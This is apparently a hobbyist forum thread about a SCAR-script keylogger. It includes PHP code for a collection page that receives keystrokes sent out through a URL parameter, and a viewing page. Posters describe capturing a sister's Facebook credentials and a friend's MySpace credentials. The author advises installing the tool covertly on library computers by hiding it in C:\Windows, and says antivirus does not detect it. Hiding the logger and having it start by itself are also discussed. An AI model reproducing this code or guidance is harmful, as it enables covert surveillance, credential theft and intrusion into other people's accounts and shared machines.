:D :D :D :D lawlz.. good idea i'll try it to xD
Printable View
how do i use this... help?
Lol, O man I love it...Many things I can pull with this :f:
Very nice script :D :D
nvm, i got this working
so amazing that a real key logger program cost so much and this works fine and it's free!
can i just use it or can i put it on someone elses computer
hackerofall92, you can only run this on any computer with scar. You can't sit on your computer and run it on someone else's computer and get sent text. You can make a script to do that, but that wouldn't be a personal keylogger like this one. That would be more of a hacker keylogger.
Glad you like the program Wayne and Wool :)
good scripts
but do you guys know how old this post is???
Who cares. If it's a good script. It should live forever since the author of the script is still updating it as we speak. :p
got a question. This may sound nooby but i don't know alot about key loggers; especaily ones used with scar.
Do you run it on your computer or does it remotely install?
It only runs on your computer and only keylogs your computer. :)
first instruction : 1. Check to see if there are a total of #909 lines in this script.
but ths script has 912 lines... (HEAVY version)
Umm... this is kind of n00bish, but how THE HECK DO YOU UNHIDE SCAR??? Lol, pressing F12 5 times doesn't work, and Ctrl+Alt+S doesn't work either.
EDIT: Nevermind, I got it to work.
Dagger, you need to press F12 fast. Very quickly, press F12 five times.
I made that so if your little brother or something knew how to kill the script, he would have a hard time doing so.
Heh :p
Nice script, mate.
I turned it on before I let my sister and friend use my laptop, and I ended up grabbing my sister's facebook.com ID and pass, as well as my friend's myspace ID and pass :p
Not gonna screw around with anything right now. I might as a joke later on.
Edit: How do I have it send the information to a webpage? I'd like to be able to keep track of what they're doing, while they're doing it :p
Oh right. I never setup the php page.
Here is the MasterKeyLogger.php page where all the keystrokes should get sent to. So if your website is www.blah.com put your MasterKeyLogger.php page somewhere and set the website in the keylogger script to the location of that page. Then attach on ?k=
Example:
www.blah.com/MasterKeyLogger.php?k=
Then set it so that it will send the keys to a website.
MasterKeyLogger.php
Create another file called SeeKeyLogger.php and put it in the same folder as MasterKeyLogger.php.Code:<?php
$k = $_GET['k'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Master Keylogger</title>
</head>
<body>
<?
if (!empty($k)) {
echo "KeyStrokes contains text. Login to see it.";
} else {
echo "Login to see the keystrokes.";
}
?>
<form action="SeeKeyLogger.php?k=<?=$k;?>" method="post">
<table>
<tr>
<td>Username: </td>
<td><input type="text" name="user" /></td>
</tr>
<tr>
<td>Password: </td>
<td><input type="password" name="pass" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="submit" value="Login" /></td>
</tr>
</table>
</form>
</body>
</html>
Enjoy! :)Code:<?php
$k = $_GET['k'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$real_user = 'RonTheCon'; // username - case sensitive
$real_pass = '123'; // password - case sensitive
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<?
If($user == $real_user and $pass == $real_pass) {
?>
Password was correct! Below is your keylogger details.<br /><br /><?=$k;?>
<?
} else {
?>
Password was incorrect. Look through the PHP code to get the username or password if you forgot it. Otherwise, fuck off.
<?
}
?>
</body>
</html>
Thanks, Ron!
I just gotta figure out how to get that freehostia to work :p
Thanks, mate. Maybe I'll set this up at the library :p
Download it.
If they have some sort of firewall set up, crack through it.
As for the restarting the computer- Just have the script run on startup ;)
I probably won't, though. I hardly ever go to the library.
Firewalls, that I have checked, do not catch this.
I checked with Norton, McAfee, and Kaspersky.
Probably didn't catch it because of the entire setup. The whole setup is a text file that is being run by scar. And since this keylogger is made in such of an obscure way and also that the majority of people who key log others, do not use scar, that the firewalls don't have a signature to catch this. :)
Oh and to install scar on a library computer. Don't download the .exe version. Just download the ZIP file from www.dylock.net/scar and then extract it in some strange folder no one accesses. Like... C:\Windows. Then you can access the files by opening up Paint or Microsoft Word or something by pressing Ctrl + O and then selecting All Files. This will show you all the files in the current folder. Navigate to the directory you put scar into, and then right click on scar.exe and instead of selecting "select", select Open.
Viola! You just got scar to run on the computer! Now just download the script, and run it. Bring your friend over and force him to go to him email. Muahahaaha. :D
Well, may be a bit confusing, so let me try to explain. :)
So, my computer is a Windows XP (Simple enough...). And I have multiple user accounts on it. It works fine when you use it just on one user account.
But when I was testing it t see whether it records the text on our "Guest" user account as well. When I pressed F12 5 times, entered the pass, SCAR pops up, but every single time, after 2 minutes of "Deleting Tags". SCAR just stops responding. So then you can't see the text that is recorded.
A bit hard to explain...:D
Oh, I was using the Heavy version, but I'll test the Lite version now.
-Dunceiam
Yeah the Heavy version has a few bugs. That's why I setup the Lite version.
I will rewrite the Heavy version from scratch and it will be loads better since I have gained a lot of scar experience since then. :) Update will be coming soon. Thanks to the many that kept this script alive!
hey ron!
is there anyway you can make it so that the scar keylogger can start up all by itself when a computer is forced to be turned off or restarted???
Alright, tried the Lite Version this time. As with the Heavy version, it works perfectly when you're using only one user account. But then when you switch, write something, go back to your original account. And try to see what it recorded, SCAR just doesn't respond. Strange...
Question, is it even supposed to record what people type on other "Users"?
@legendary, Seems possible if you add it into your computers set-up. Although, I don't know much about that...:)
-Dunceiam
Dunceiam, what do you mean by Users and Accounts?
And Legendary, I don't think that's possible. :( Sorry.